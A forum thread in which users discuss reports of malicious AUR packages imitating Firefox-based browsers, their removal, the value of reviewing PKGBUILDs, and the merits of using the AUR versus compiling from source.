AUR firefox might be infected

Topic: AUR firefox might be infected (Read 1303 times) previous topic - next topic

0 Members and 2 Guests are viewing this topic.

AUR firefox might be infected

23 July 2025, 12:55:02

This story suggests arch AUR firefox derivatives might be compromised.

Re: AUR firefox might be infected

Reply #1 – 23 July 2025, 16:54:02

Read carefully. It wasn't the Firefox packages. It was packages mimicking them.
https://lists.archlinux.org/archives/list/[email protected]/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/
Already solved.

Re: AUR firefox might be infected

Reply #2 – 23 July 2025, 17:06:18

Yep, I've seen this story making the rounds. It's honestly probably not a big deal.

Quote

The compromised packages were called librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin

If anyone installed one of these obviously sketchy packages, you should not have an AUR helper installed on your system. It's for your own good.

Brodie Robertson on YouTube speculated that it already got installed a few times because they had some votes. I tend to believe that those numbers were artificially inflated by dummy accounts. Then the perp thought it wise to get a bunch of Redditors' eyes on it, which resulted it their prompt removal from the AUR.

Let this be a reminder to read and understand PKGBUILDs before building and installing them.

Re: AUR firefox might be infected

Reply #3 – 24 July 2025, 06:30:11

Quote from: corysanin – on 23 July 2025, 17:06:18

Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)

Re: AUR firefox might be infected

Reply #4 – 24 July 2025, 12:55:52

Quote from: cds – on 24 July 2025, 06:30:11

Quote from: corysanin – on 23 July 2025, 17:06:18
Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)

really.... I have. In fact, I get vital software I can not live without from the AUR, not the least of which is WIndow Maker, the Windows Manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...

Re: AUR firefox might be infected

Reply #5 – 26 July 2025, 00:31:47

Quote from: mrbrklyn – on 24 July 2025, 12:55:52

Quote from: cds – on 24 July 2025, 06:30:11

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)

really.... I have. In fact, I get vital software I can not live without from the AUR, not the least of which is WIndow Maker, the Windows Manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...

Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself. There was a time tho, a few years back when I wanted to move from Eagle CAD to KiCad. Back then, only really, really new KiCad had the import feature. That was about as complex as I got.
Of course, now that the import feature is standard... Oh wait, there is possibly one. Chirp - but here again, I could just go to the source.

Re: AUR firefox might be infected

Reply #6 – 26 July 2025, 00:47:45

Quote from: cds – on 26 July 2025, 00:31:47

Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself

If you just review a simple PKGBUILD the same thing results.
Not all PKGBUILD's are simple though..

Re: AUR firefox might be infected

Reply #7 – 26 July 2025, 09:38:42

I have some customized packages eg gvim which I prefer to use compiled against gtk2 rather than gtk3. It's fairly easy to download the pkg repo from artix or arch and then make small changes to the PKGBUILD.

I think using makepkg with a modified official PKGBUILD is probably less risky and at least preserves the pacman database.

Compiling from source will scatter files about and possibly lead to confusion; as example I just found

Code: [Select]

$ packer -Qo /lib/pyston3.8
error: No package owns /lib/pyston3.8

I vaguely remember pyston, but 3.8 was a long time ago

Re: AUR firefox might be infected

Reply #8 – 26 July 2025, 14:55:19

On a Debian based system with no AUR, building from source was quite common, the thing to do was define the install directory to be under /usr/local during the build configuration, you shouldn't touch the main system dirs to avoid problems. It can be done without the AUR but it still won't stop the risk of installing infected software if it's in the source itself, which can happen too. Using the AUR actually adds another layer of oversight and could be seen as making things safer in some ways than picking up random code online, despite the additional risk of a compromised PKGBUILD, there are advantages and drawbacks to both approaches I think. You could stick to only using official code and not forks, but you can make that same choice in the AUR as well.